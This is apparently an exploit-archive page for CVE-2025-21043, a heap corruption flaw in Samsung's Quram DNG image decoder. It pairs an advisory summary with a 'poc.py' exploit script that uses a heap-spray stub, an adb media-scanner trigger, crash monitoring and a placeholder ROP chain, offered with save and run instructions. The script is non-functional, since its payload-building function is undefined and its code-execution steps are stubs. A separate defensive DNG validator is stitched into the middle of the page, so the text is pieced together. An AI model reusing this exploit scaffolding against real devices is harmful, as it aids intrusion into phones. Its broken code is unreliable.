Samsung Quram DNG Remote Code Execution
=============================================================================================================================================
| # Title Samsung Quram DNG Remote Code Execution
=============================================================================================================================================
| # Title : Samsung QuramDNG Heap Exploitation via Malformed (libimagecodec.quram.so) |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.2 (64 bits) |
| # Vendor : System built-in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211370/ & CVE-2025-21043
[+] Summary : A vulnerability exists in Samsung's image decoding library (libimagecodec.quram.so), which is responsible for parsing Digital Negatives (DNG).
A malformed DNG containing oversized IFD entries can cause heap corruption.
With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.
[+] Affected Platforms (Likely Impact)
Devices using the Quram codec and shipping a vulnerable libimagecodec.quram.so, typically:
Galaxy S22 / S23 / S24 series
Galaxy Z Fold / Z Flip
Galaxy A and Tab series
Any Samsung model using the Quram decoder before SMR-SEP-2025
[+] OS Builds Affected:
Android builds where the Quram codec is present and security patch level < September 2025
[+] Technical Description (Root Cause)
libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:
The IFD entry count is taken directly from the attacker-controlled file.
No validation checks that count against the file size or the destination buffer.
Heap allocator metadata and adjacent buffers may therefore be overwritten.
A controlled overwrite can hijack control flow and result in code execution.
Critical vulnerable function:
doMapPoly16()
located inside the Quram image parsing logic.
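The missing check described above can be stated as a structural validator: a parser that walks the DNG/TIFF IFD chain and refuses any entry count that cannot physically fit in the file. The following is an added example written for this page, not code from the advisory or from Samsung's library; `check_dng_ifds`, `MAX_IFD_ENTRIES`, `build_sample` and the three constructed sample buffers are assumptions, and the policy threshold is arbitrary. It generalizes the page's single point (an oversized IFD entry count) to the neighbouring bounds checks a decoder or a content filter needs: out-of-line values whose offsets point past the end of the file, and IFD chains that loop.

```python
import struct

# Bytes per element for each TIFF 6.0 / DNG field type code.
# Unknown type codes are reported as findings rather than guessed.
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1,
              8: 2, 9: 4, 10: 8, 11: 4, 12: 8, 13: 4}

# Policy ceiling on entries per IFD. Assumption for this example: real DNGs
# carry tens of entries, so thousands is a strong malformation signal.
MAX_IFD_ENTRIES = 4096


def check_dng_ifds(data: bytes, max_entries: int = MAX_IFD_ENTRIES) -> list:
    """Walk the IFD chain of a TIFF/DNG buffer and return a list of findings.

    An empty list means every IFD entry count and every out-of-line value
    fits inside the buffer, which is exactly the check the advisory says the
    decoder omits.
    """
    findings = []
    if len(data) < 8:
        return ["file shorter than the 8-byte TIFF header"]
    order = data[:2]
    if order == b"II":
        fmt = "<"
    elif order == b"MM":
        fmt = ">"
    else:
        return ["not a TIFF/DNG container (byte-order mark %r)" % order]
    magic, ifd_offset = struct.unpack(fmt + "HI", data[2:8])
    if magic != 42:
        return ["bad TIFF magic value %d" % magic]

    seen = set()
    while ifd_offset:
        if ifd_offset in seen:
            findings.append("IFD chain loops back to offset %d" % ifd_offset)
            break
        seen.add(ifd_offset)
        if ifd_offset + 2 > len(data):
            findings.append("IFD offset %d lies outside the file" % ifd_offset)
            break
        (count,) = struct.unpack(fmt + "H", data[ifd_offset:ifd_offset + 2])
        # Bytes the IFD claims to occupy: 2-byte count, 12 bytes per entry,
        # 4-byte next-IFD pointer. Sizing a buffer from 'count' without this
        # comparison is the root cause the advisory describes.
        end = ifd_offset + 2 + count * 12 + 4
        if count > max_entries:
            findings.append("IFD at %d declares %d entries (policy max %d)"
                            % (ifd_offset, count, max_entries))
        if end > len(data):
            findings.append("IFD at %d declares %d entries but only %d bytes remain"
                            % (ifd_offset, count, len(data) - ifd_offset))
            break
        for i in range(count):
            base = ifd_offset + 2 + i * 12
            tag, ftype, fcount, value = struct.unpack(fmt + "HHII", data[base:base + 12])
            size = TYPE_SIZES.get(ftype)
            if size is None:
                findings.append("entry %d (tag 0x%04x) has unknown type %d" % (i, tag, ftype))
                continue
            total = size * fcount
            # Values wider than 4 bytes live out of line; 'value' is then an offset.
            if total > 4 and value + total > len(data):
                findings.append("entry %d (tag 0x%04x) points %d bytes past the file end"
                                % (i, tag, value + total - len(data)))
        (ifd_offset,) = struct.unpack(fmt + "I", data[end - 4:end])
    return findings


def build_sample(count_field: int, entries: bytes, next_ifd: int = 0) -> bytes:
    """Constructed test vector: little-endian header with one IFD at offset 8."""
    return (b"II" + struct.pack("<HI", 42, 8)
            + struct.pack("<H", count_field) + entries
            + struct.pack("<I", next_ifd))


# Constructed samples. One ImageWidth entry (tag 0x0100, type SHORT, one
# value, stored inline) makes a minimal but structurally valid IFD.
ENTRY = struct.pack("<HHII", 0x0100, 3, 1, 16)
WELL_FORMED = build_sample(1, ENTRY)
OVERSIZED = build_sample(0xFFFF, ENTRY)   # declares 65535 entries in a 26-byte file
DANGLING = build_sample(1, struct.pack("<HHII", 0x0100, 4, 4, 0x1000))  # 16-byte LONG array at offset 4096


if __name__ == "__main__":
    for name, buf in (("well-formed", WELL_FORMED), ("oversized", OVERSIZED), ("dangling", DANGLING)):
        print(name, check_dng_ifds(buf) or "OK")
```

Run as a script it prints one line per sample; imported, `check_dng_ifds` can sit in front of any pipeline that hands images to a native decoder (MDM content filters, mail gateways, a fuzzing triage harness) so that files with impossible IFD geometry are rejected or quarantined before the decoder ever allocates from the attacker-supplied count.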
Instructions For Saving:
------------------------
1) Save file as:
poc.py
Instructions For Running:
-------------------------
python3 poc.py
[+] POC :
import os
import subprocess
import time


class QuramDngExploit:
    def __init__(self):
        self.malicious_dng = None

    def craft_exploit(self):
        """Create DNG with controlled heap layout"""
        print("[*] Crafting malicious DNG file...")
        # create_malicious_dng() is not defined anywhere in the published PoC,
        # so this call raises NameError as written; the file-crafting step is
        # left out of the script.
        dng_data = create_malicious_dng()
        return dng_data

    def spray_heap(self):
        """Spray heap with controlled objects"""
        # Java source held as a string only; the published PoC never compiles
        # or runs it, and trigger() does not call this method.
        spray_code = """
import java.util.ArrayList;

public class HeapSpray {
    private static ArrayList<byte[]> sprayList = new ArrayList<>();

    public static void spray(int count, int size) {
        for (int i = 0; i < count; i++) {
            byte[] buffer = new byte[size];
            // Fill with pointer-like values
            for (int j = 0; j < size; j += 8) {
                // Address we want to write
                buffer[j] = (byte)0x41;
            }
            sprayList.add(buffer);
        }
    }
}
"""

    def trigger(self):
        """Trigger the vulnerability"""
        print("[*] Triggering vulnerability...")
        temp_file = "/data/local/tmp/exploit.dng"
        # The file is written to this path on the host running the script; the
        # broadcast below names the same path on the device (assumes adb is on
        # PATH and a device is attached).
        with open(temp_file, 'wb') as f:
            f.write(self.craft_exploit())
        cmd = [
            'adb', 'shell',
            'am', 'broadcast',
            '-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
            '-d', f'file://{temp_file}'
        ]
        subprocess.run(cmd)
        print("[*] Waiting for com.samsung.ipservice to process file...")
        time.sleep(10)
        self.monitor_logcat()

    def monitor_logcat(self):
        """Monitor for crash logs"""
        print("[*] Monitoring logcat for crashes...")
        # Blocks until a matching line appears; the logcat process is not
        # terminated afterwards.
        logcat = subprocess.Popen(
            ['adb', 'logcat', '-s', 'DEBUG'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        for line in logcat.stdout:
            line = line.decode('utf-8', errors='ignore')
            if 'SIGSEGV' in line or 'libimagecodec.quram' in line:
                print("[+] Crash detected!")
                print(line)
                break

    def build_rop_chain(self):
        """Build ROP chain for ARM64"""
        # Placeholder addresses only; the chain is never populated or used.
        rop_chain = []
        gadgets = {
            'pop_x0': 0x123456,  # placeholder
            'pop_x1': 0x123457,
            'system': 0x123458,
            'blr_x19': 0x123459,
        }
        return rop_chain

    def achieve_rce(self):
        """Attempt to achieve Remote Code Execution"""
        # Stub: always returns False and is never called from __main__.
        print("[*] Attempting to achieve RCE...")
        shellcode = (
            b"\x00\x00\x00\x00"
        )
        return False


if __name__ == "__main__":
    exploit = QuramDngExploit()
    print("[*] Starting QuramDng exploit (CVE-2025-21043)")
    print("[*] Target: libimagecodec.quram.so")
    print("[*] Vulnerability: OOB Write in doMapPoly16")
    # craft_exploit() is called here and again inside trigger().
    exploit.craft_exploit()
    exploit.trigger()
    print("[*] Exploit completed")
Greetings to :
===================================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================